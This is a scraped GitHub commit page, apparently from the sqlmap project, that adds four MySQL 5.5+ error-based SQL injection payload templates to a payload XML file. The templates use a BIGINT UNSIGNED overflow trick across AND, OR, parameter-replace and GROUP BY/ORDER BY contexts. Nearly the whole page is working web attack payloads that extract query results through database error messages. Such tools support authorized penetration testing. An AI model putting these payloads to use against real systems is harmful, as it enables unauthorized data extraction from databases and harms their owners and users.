Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit b7aeb67

Browse files
stamparmstamparm
committed
Implementation of a new MySQL error-based payload (found at RDot)
1 parent 8ea22c5 commit b7aeb67

1 file changed

Lines changed: 80 additions & 0 deletions

File tree

xml/payloads.xml

Lines changed: 80 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1252,6 +1252,26 @@ Formats:
12521252
</details>
12531253
</test>
12541254

1255+
<test>
1256+
<title>MySQL &gt;= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
1257+
<stype>2</stype>
1258+
<level>4</level>
1259+
<risk>0</risk>
1260+
<clause>1</clause>
1261+
<where>1</where>
1262+
<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
1263+
<request>
1264+
<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
1265+
</request>
1266+
<response>
1267+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1268+
</response>
1269+
<details>
1270+
<dbms>MySQL</dbms>
1271+
<dbms_version>&gt;= 5.5</dbms_version>
1272+
</details>
1273+
</test>
1274+
12551275
<test>
12561276
<title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
12571277
<stype>2</stype>
@@ -1470,6 +1490,26 @@ Formats:
14701490
</details>
14711491
</test>
14721492

1493+
<test>
1494+
<title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
1495+
<stype>2</stype>
1496+
<level>5</level>
1497+
<risk>2</risk>
1498+
<clause>1</clause>
1499+
<where>1</where>
1500+
<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
1501+
<request>
1502+
<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
1503+
</request>
1504+
<response>
1505+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1506+
</response>
1507+
<details>
1508+
<dbms>MySQL</dbms>
1509+
<dbms_version>&gt;= 5.5</dbms_version>
1510+
</details>
1511+
</test>
1512+
14731513
<test>
14741514
<title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
14751515
<stype>2</stype>
@@ -1715,6 +1755,26 @@ Formats:
17151755
</details>
17161756
</test>
17171757

1758+
<test>
1759+
<title>MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
1760+
<stype>2</stype>
1761+
<level>5</level>
1762+
<risk>0</risk>
1763+
<clause>1,2,3</clause>
1764+
<where>3</where>
1765+
<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
1766+
<request>
1767+
<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
1768+
</request>
1769+
<response>
1770+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1771+
</response>
1772+
<details>
1773+
<dbms>MySQL</dbms>
1774+
<dbms_version>&gt;= 5.5</dbms_version>
1775+
</details>
1776+
</test>
1777+
17181778
<test>
17191779
<title>PostgreSQL error-based - Parameter replace</title>
17201780
<stype>2</stype>
@@ -1877,6 +1937,26 @@ Formats:
18771937
</details>
18781938
</test>
18791939

1940+
<test>
1941+
<title>MySQL &gt;= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
1942+
<stype>2</stype>
1943+
<level>5</level>
1944+
<risk>0</risk>
1945+
<clause>2,3</clause>
1946+
<where>1</where>
1947+
<vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
1948+
<request>
1949+
<payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
1950+
</request>
1951+
<response>
1952+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1953+
</response>
1954+
<details>
1955+
<dbms>MySQL</dbms>
1956+
<dbms_version>&gt;= 5.5</dbms_version>
1957+
</details>
1958+
</test>
1959+
18801960
<test>
18811961
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
18821962
<stype>2</stype>

0 commit comments

Comments
 (0)